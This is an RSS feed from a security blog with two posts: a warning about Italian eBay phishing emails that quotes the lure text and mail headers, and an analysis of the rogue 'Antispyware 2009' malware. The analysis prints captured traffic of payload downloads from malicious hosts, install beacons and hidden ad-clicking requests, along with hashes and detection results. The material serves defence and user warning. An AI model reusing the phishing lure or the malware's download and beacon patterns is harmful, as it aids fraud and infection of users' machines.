<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0"
	xmlns:content="http://purl.org/rss/1.0/modules/content/"
	xmlns:wfw="http://wellformedweb.org/CommentAPI/"
	xmlns:dc="http://purl.org/dc/elements/1.1/"
	xmlns:atom="http://www.w3.org/2005/Atom"
	xmlns:sy="http://purl.org/rss/1.0/modules/syndication/"
	xmlns:slash="http://purl.org/rss/1.0/modules/slash/"
	>

<channel>
	<title>NoVirusThanks Blog &#187; scam</title>
	<atom:link href="http://blog.novirusthanks.org/tag/scam/feed/" rel="self" type="application/rss+xml" />
	<link>http://blog.novirusthanks.org</link>
	<description>Security News and Malware Analysis</description>
	<lastBuildDate>Wed, 01 Feb 2012 13:34:38 +0000</lastBuildDate>
	<language>en</language>
	<sy:updatePeriod>hourly</sy:updatePeriod>
	<sy:updateFrequency>1</sy:updateFrequency>
	<generator>http://wordpress.org/?v=3.2.1</generator>
		<item>
		<title>Promemoria eBay per oggetto non pagato numero</title>
		<link>http://blog.novirusthanks.org/2009/01/phishing-promemoria-ebay-per-oggetto-non-pagato-numero/</link>
		<comments>http://blog.novirusthanks.org/2009/01/phishing-promemoria-ebay-per-oggetto-non-pagato-numero/#comments</comments>
		<pubDate>Thu, 29 Jan 2009 22:59:06 +0000</pubDate>
		<dc:creator>admin</dc:creator>
				<category><![CDATA[Phishing]]></category>
		<category><![CDATA[ebay spam]]></category>
		<category><![CDATA[fraud]]></category>
		<category><![CDATA[scam]]></category>
		<category><![CDATA[Spam]]></category>

		<guid isPermaLink="false">http://novirusthanks.org/blog/?p=818</guid>
		<description><![CDATA[We received again new false eBay emails that redirects the user to visit a webpage that is used to steals the user&#8217;s eBay account with a false webpage, similar to the original eBay homepage, that save the logi account typed by the user and send the sensitive data to the attacker. &#160; Message Promemoria eBay [...]]]></description>
			<content:encoded><![CDATA[<p>We received again new false eBay emails that redirects the user to visit a webpage that is used to steals the user&#8217;s eBay account with a false webpage, similar to the original eBay homepage, that save the logi account typed by the user and send the sensitive data to the attacker.</p>
<p>&nbsp;</p>
<p><u>Message</u></p>
<blockquote><p>
Promemoria eBay per oggetto non pagato numero 3104678753291</p>
<p>Gentile member,<br />
alenf ha segnalato di non avere ancora ricevuto il pagamento per il seguente<br />
oggetto: numero 3104678753291</p>
<p>Al momento non viene intrapresa alcuna azione nei confronti del tuo account.<br />
Tuttavia, ti ricordiamo che quando fai un&#8217;offerta o acquisti un oggetto su eBay,<br />
prendi un impegno vincolante con il venditore. Se la situazione non verr? risolta<br />
entro 7 giorni dalla ricezione di questo promemoria, riceverai un ammonimento per<br />
oggetto non pagato&#8230;
</p></blockquote>
<p><u>Header</u></p>
<blockquote><p>
<strong>Received</strong>: from hsenc.co.kr (unknown [211.215.20.40])<br />
<strong>Received</strong>: from User (80.229.253.105)<br />
by hsenc.co.kr (211.215.20.40) with [Nmail V3.6]<br />
<strong>Subject</strong>: Promemoria eBay per oggetto non pagato numero 3104678753291<br />
<strong>Date</strong>: Thu, 29 Jan 2009 15:25:31 -0000
</p></blockquote>
<blockquote><p>
<strong>Received</strong>: from 419revolution.org (unknown [211.106.23.71])<br />
<strong>Received</strong>: from User ([])<br />
by 419revolution.org (Merak 6.1.0)<br />
<strong>Subject</strong>: Promemoria eBay per oggetto non pagato numero 292567831524<br />
<strong>Date</strong>: Mon, 28 Jan 2009 14:38:18 -0000
</p></blockquote>
<blockquote><p><strong>Received</strong>: from mail.quike.com.cn (unknown [202.75.222.151])<br />
<strong>Received</strong>: from User ([80.229.253.105])<br />
by 211.155.233.151 with ESMTP<br />
<strong>Subject</strong>: Hai ricevuto un ammonimento per Oggetto non pagato 260300220759<br />
<strong>Date</strong>: Mon, 28 Jan 2009 14:38:18 -0000
</p></blockquote>
<blockquote><p>
<strong>Received</strong>: from topinfo.com.cn (unknown [211.157.2.61])<br />
<strong>Received</strong>: from User [80.229.253.105] by topinfo.com.cn<br />
<strong>Subject</strong>: Promemoria eBay per oggetto non pagato numero 299010852347<br />
<strong>Date</strong>: Mon, 17 Nov 2008 10:51:59 -0000
</p></blockquote>
<p>Make sure to not fall in this scam, check always the address of the site before write sensitive data in web forms and analyze always the header of the emails.</p>
]]></content:encoded>
			<wfw:commentRss>http://blog.novirusthanks.org/2009/01/phishing-promemoria-ebay-per-oggetto-non-pagato-numero/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Rogue Antispyware 2009 served through beedly.us ADS</title>
		<link>http://blog.novirusthanks.org/2008/11/rogue-antispyware-2009-served-through-beedlyus-ads/</link>
		<comments>http://blog.novirusthanks.org/2008/11/rogue-antispyware-2009-served-through-beedlyus-ads/#comments</comments>
		<pubDate>Thu, 13 Nov 2008 20:02:37 +0000</pubDate>
		<dc:creator>admin</dc:creator>
				<category><![CDATA[Malware Analysis]]></category>
		<category><![CDATA[antispyware2009]]></category>
		<category><![CDATA[fake av]]></category>
		<category><![CDATA[rogue]]></category>
		<category><![CDATA[scam]]></category>

		<guid isPermaLink="false">http://novirusthanks.org/blog/?p=229</guid>
		<description><![CDATA[Today, when I was browsing the beedly.us website, I saw a suspicious ADS link where there was a link to the malicious website proantispyware2009(dot)com, so I started to analyze the link and, below, there is the result: &#160; &#160; So after clicking on the ADS I was redirected to a new sub-domain: &#160; &#160; and [...]]]></description>
			<content:encoded><![CDATA[<p>Today, when I was browsing the beedly.us website, I saw a suspicious ADS link where there was a link to the malicious website proantispyware2009(dot)com, so I started to analyze the link and, below, there is the result:</p>
<p>&nbsp;</p>
<p><img src="http://blog.novirusthanks.org/wp-content/uploads/proantispyware.com_server_on_bleedy_1.gif" alt="Screenshot" title="Pornographic Advertisement Banner" width="530" height="300" /></p>
<p>&nbsp;</p>
<p>So after clicking on the ADS I was redirected to a new sub-domain:</p>
<p>&nbsp;</p>
<p><img src="http://blog.novirusthanks.org/wp-content/uploads/proantispyware.com_server_on_bleedy_2.gif" alt="Screenshot" title="Malicious Subdomain" /></p>
<p>&nbsp;</p>
<p>and if we view the <a href="http://blog.novirusthanks.org/wp-content/uploads/proantispyware.com_server_on_bleedy_3.gif" target="_blank">HTML code</a> is possible to see that if we click in the remove button we will be prompted to download a file named setup_246_3777_.exe that is the real setup file of the rogue security software.</p>
<blockquote>
<p>Report Generated 	13.11.2008 at 20.33.51 (GMT 1)<br />
Filename: 	<b>setup_246_3777_.exe</b><br />
File size: 	112 KB<br />
MD5 Hash: 	E9339F9045368947789EC70739DE4B21<br />
SHA1 Hash: 	DC7B37C1158F5AD4D3E092AFCADE58A5E3FC145B<br />
Application Type:	Executable (EXE) 32bit<br />
Detection Rate:	0 on 23</p>
</p>
</blockquote>
<p>After I executed the .EXE file we started to get some new traffic:</p>
<p>&nbsp;</p>
<p><img src="http://blog.novirusthanks.org/wp-content/uploads/proantispyware.com_server_on_bleedy_4.gif" alt="Screenshot" title="ProAntispyware 2009 setup window" /></p>

<div class="wp_syntax"><table><tr><td class="line_numbers"><pre>1
2
3
4
5
6
7
</pre></td><td class="code"><pre class="test" style="font-family:monospace;">GET /get/?type=scanner&amp;pin=246&amp;lnd=3777 HTTP/1.1
User-Agent: Installer
Host: dl.storage-antispyware.com
&nbsp;
HTTP/1.1 200 OK
Content-Disposition: attachment; filename=scanner_246_3777_.exe
Content-Transfer-Encoding: binary</pre></td></tr></table></div>

<p>From this traffic we can see that a new file is downloaded:</p>

<div class="wp_syntax"><table><tr><td class="line_numbers"><pre>1
</pre></td><td class="code"><pre class="text" style="font-family:monospace;">filename=scanner_246_3777_.exe</pre></td></tr></table></div>

<p>It is the installer for the rogue security software Antispyware 2009! </p>
<blockquote>
<p>Report Generated 	13.11.2008 at 21.24.07 (GMT 1)<br />
Filename: 	<b>scanner_246_3777_.exe</b><br />
File size: 	811 KB<br />
MD5 Hash: 	E0F855C6C5FC93F0A8ED1FE9E702E492<br />
SHA1 Hash: 	77ACC5822A5EBD734075BDF4752EC6F10617050F<br />
Detection Rate:	<font color="red">9</font> on 23</p>
<p>&nbsp;</p>
<p>Antivirus 	Result<br />
a-squared 	<font color="red">Trojan.Fakealert.ads.1!IK</font><br />
Avira AntiVir 	<font color="red">TR/Fakealert.ads.1</font><br />
Avast 	<font color="red">Win32:Spyware-gen [Trj] (0)</font><br />
AVG 	<font color="red">Trojan horse SHeur.CQDP</font><br />
BitDefender 	<font color="red">Trojan.FakeAlert.AKQ</font><br />
ClamAV 	-<br />
Comodo 	-<br />
Dr.Web 	-<br />
Ewido 	-<br />
F-PROT 6 	-<br />
G DATA 	<font color="red">Win32:Spyware-gen [Trj] B</font><br />
IkarusT3 	<font color="red">Trojan.Fakealert.ads.1</font><br />
Kaspersky 	-<br />
McAfee <font color="red"> PWCrack-Winspy trojan</font><br />
NOD32 v3 	-<br />
Norman 	<font color="red">Aggressive commersial W32/AntiVirus2008.TB ()</font><br />
Panda 	-<br />
QuickHeal 	-<br />
Solo Antivirus 	-<br />
Sophos -<br />
TrendMicro 	-<br />
VBA32 	-<br />
VirusBuster 	-</p>
</blockquote>
<p>Next, a new .EXE is downloaded and executed in my system:</p>

<div class="wp_syntax"><table><tr><td class="line_numbers"><pre>1
2
3
4
5
6
7
</pre></td><td class="code"><pre class="text" style="font-family:monospace;">GET /mxlivemedia/get_file.php HTTP/1.1
User-Agent: Installer
Host: 85.92.157.141
&nbsp;
GET /mxlivemedia/multi/16.exe HTTP/1.1
User-Agent: Installer
Host: 85.92.157.141</pre></td></tr></table></div>

<p>and the file is:</p>

<div class="wp_syntax"><table><tr><td class="line_numbers"><pre>1
</pre></td><td class="code"><pre class="text" style="font-family:monospace;">Location: multi/16.exe</pre></td></tr></table></div>

<blockquote>
<p>Report Generated 	13.11.2008 at 20.39.42 (GMT 1)<br />
Filename: 	<b>16.exe</b><br />
File size: 	598 KB<br />
MD5 Hash: 	9A785CF7901E348C1840925EB5E0C5CC<br />
SHA1 Hash: 	189EEA8FB44360C5E4011BB471D7F1D8F7B3F7AC<br />
Detection Rate:	<font color="red">2</font> on 23</p>
<p>&nbsp;</p>
<p>Antivirus 	Result<br />
a-squared 	-<br />
Avira AntiVir 	-<br />
Avast 	-<br />
AVG 	-<br />
BitDefender 	<font color="red">Generic.Adw.Rotator.FF995C71</font><br />
ClamAV 	-<br />
Comodo 	-<br />
Dr.Web 	-<br />
Ewido 	-<br />
F-PROT 6 	-<br />
G DATA 	-<br />
IkarusT3 	-<br />
Kaspersky 	<font color="red">Trojan-Clicker.Win32.Agent.evi</font><br />
McAfee 	-<br />
NOD32 v3 	-<br />
Norman 	-<br />
Panda 	-<br />
QuickHeal 	-<br />
Solo Antivirus 	-<br />
Sophos 	-<br />
TrendMicro 	-<br />
VBA32 	-<br />
VirusBuster 	-</p>
</blockquote>
<p>After 16.exe is executed we started to get new traffic from new hosts:</p>

<div class="wp_syntax"><table><tr><td class="line_numbers"><pre>1
2
3
4
5
6
7
8
9
10
</pre></td><td class="code"><pre class="text" style="font-family:monospace;">GET /stat.php?func=install&amp;pid=246&amp;ip=127.0.0.1&amp;landing=3777
Host: int.vbvyu.com
&nbsp;
GET /smb/nsi_install.php?inst_result=success&amp;hwid=xxx
Host: a2.mxlivemedia.com
User-Agent: NSISDL/1.2 (Mozilla)
&nbsp;
GET /bc/nsi_install.php?aff_id=mxlivemedia&amp;inst_result=success&amp;id=xxx
Host: a1.mxlivemedia.com
User-Agent: NSISDL/1.2 (Mozilla)</pre></td></tr></table></div>

<p>and after, <b>IEXPLORE.EXE</b> was executed hidden and the malware started to clickjack the ADS Links hidden!</p>

<div class="wp_syntax"><table><tr><td class="line_numbers"><pre>1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
</pre></td><td class="code"><pre class="text" style="font-family:monospace;">GET /servlet/ajrotator/246392/0/vh?z=icm&amp;dim=186262
Referer: http://a1.mxlivemedia.com/bc/ads/728x90/48dcc730ea0ce.html
Host: rotator.its.adjuggler.com
&nbsp;
GET /servlet/ajrotator/7678/0/vh?z=ast&amp;ch=7108&amp;dim=56
Referer: http://a1.mxlivemedia.com/bc/ads/728x90/48e220b3afd5f.html
Host: servedby.topqualityads.net
&nbsp;
GET /bc/ads/300x250/48e220b3afd5f.html
Referer: http://a1.mxlivemedia.com/bc/123kah.php
Host: a1.mxlivemedia.com
&nbsp;
GET /bc/ads/160x600/48e220b3afd5f.html
Referer: http://a1.mxlivemedia.com/bc/123kah.php
Host: a1.mxlivemedia.com
&nbsp;
GET /bc/ads/728x90/48e220b3afd5f.html
Referer: http://a1.mxlivemedia.com/bc/123kah.php
&nbsp;
GET /bc/ads/728x90/48dcc730ea0ce.html
Referer: http://a1.mxlivemedia.com/bc/123kah.php
Host: a1.mxlivemedia.com
&nbsp;
POST /bc/123kah.php
Host: a1.mxlivemedia.com</pre></td></tr></table></div>

<p>After, new files was created in <strong>system32</strong>:</p>
<p>&nbsp;</p>
<p><img src="http://blog.novirusthanks.org/wp-content/uploads/proantispyware.com_server_on_bleedy_9.gif" alt="Screenshot" title="Files created in system32" /></p>
<p>&nbsp;</p>
<blockquote>
<p>Report Generated 	13.11.2008 at 20.50.00 (GMT 1)<br />
Filename: 	<b>msclgkhvhfp.dll</b><br />
File size: 	173 KB<br />
MD5 Hash: 	8532E92178E9126A151E31683D896C31<br />
SHA1 Hash: 	088E2728D8D7D5E185AF231F54D917605F7CED24<br />
Detection Rate:	<font color="red">6</font> on 23</p>
<p>&nbsp;</p>
<p>Antivirus 	Result<br />
a-squared 	<font color="red">Generic.Adw.Rotator!IK</font><br />
Avira AntiVir 	-<br />
Avast 	-<br />
AVG 	-<br />
BitDefender 	<font color="red">Generic.Adw.Rotator.FF995C71</font><br />
ClamAV 	-<br />
Comodo 	-<br />
Dr.Web 	-<br />
Ewido 	-<br />
F-PROT 6 	-<br />
G DATA 	<font color="red">Trojan-Clicker.Win32.Agent.evi A</font><br />
IkarusT3 	<font color="red">Generic.Adw.Rotator</font><br />
Kaspersky 	<font color="red">Trojan-Clicker.Win32.Agent.evi</font><br />
McAfee 	<font color="red">AdClicker-GI trojan</font><br />
NOD32 v3 	-<br />
Norman 	-<br />
Panda 	-<br />
QuickHeal 	-<br />
Solo Antivirus 	-<br />
Sophos 	-<br />
TrendMicro 	-<br />
VBA32 	-<br />
VirusBuster 	-</p>
</blockquote>
<p>Below there are the IEXPLORE.EXE connections:</p>
<p>&nbsp;</p>
<p><img src="http://blog.novirusthanks.org/wp-content/uploads/proantispyware.com_server_on_bleedy_8.gif" alt="Screenshot" title="Connections generated by the process named IEXPLORE.EXE" /></p>
<p>&nbsp;</p>
<p>And finally appeared the image of the rogue security software Antispyware 2009 in the screen:</p>
<p>&nbsp;</p>
<p><img src="http://blog.novirusthanks.org/wp-content/uploads/proantispyware.com_server_on_bleedy_7.gif" alt="Screenshot" title="Antispyware 2009 Image" width="530" height="330" /></p>
<p>&nbsp;</p>
<p>I have created a small summary of the activity of what happened during this analysis:</p>
<p>&nbsp;</p>
<p><img src="http://blog.novirusthanks.org/wp-content/uploads/proantispyware.com_server_on_bleedy_Result.gif" alt="Screenshot" title="Summary" width="530" height="500" /></p>
<p>&nbsp;</p>
<p>And after reading the article of <a href="http://www.sophos.com/security/blog/2008/11/1955.html" target="_blank">SophosLabs</a>  that steve has posted in the comments, I have analyzed with OllyDbg the file setup_246_3777_.exe and below there are some images:</p>
<p>&nbsp;</p>
<p>Original Entry Point:</p>
<p>&nbsp;</p>
<p><img src="http://blog.novirusthanks.org/wp-content/uploads/proantispyware.com_server_on_bleedy_10.gif" alt="Screenshot" title="OEP" width="530" /></p>
<p>&nbsp;</p>
<p>Now, if I follow the address CALL 0040116D, I arrive at the code shown in the image below:</p>
<p>&nbsp;</p>
<p><img src="http://blog.novirusthanks.org/wp-content/uploads/proantispyware.com_server_on_bleedy_12.gif" alt="Screenshot" /></p>
<p>&nbsp;</p>
<p>And now, If I follow the address MOV EDX,00405DEC, I arrive at the code shown in image below, that is full of zero bytes (similar to the analysis of SophosLabs):</p>
<p>&nbsp;</p>
<p><img src="http://blog.novirusthanks.org/wp-content/uploads/proantispyware.com_server_on_bleedy_13.gif" alt="Screenshot" width="530"/></p>
<p>&nbsp;</p>
<p>And for finish, below, I have added some images of the fake alerts shown by Pro Antispyware 2009:</p>
<p>&nbsp;</p>
<p><img src="http://blog.novirusthanks.org/wp-content/uploads/proantispyware.com_server_on_bleedy_14.gif" alt="Fake alert" /></p>
<p>&nbsp;</p>
<p>Make sure to not fall in this scam, if your computer is infected with Antispyware 2009, it is recommended to remove it immediately and to scan your system with <a href="http://www.novirusthanks.org/products/novirusthanks-malware-remover/" target="_blank" title="Free Malware Remover">NoVirusThanks Malware Remover</a>.</p>
]]></content:encoded>
			<wfw:commentRss>http://blog.novirusthanks.org/2008/11/rogue-antispyware-2009-served-through-beedlyus-ads/feed/</wfw:commentRss>
		<slash:comments>2</slash:comments>
		</item>
	</channel>
</rss>

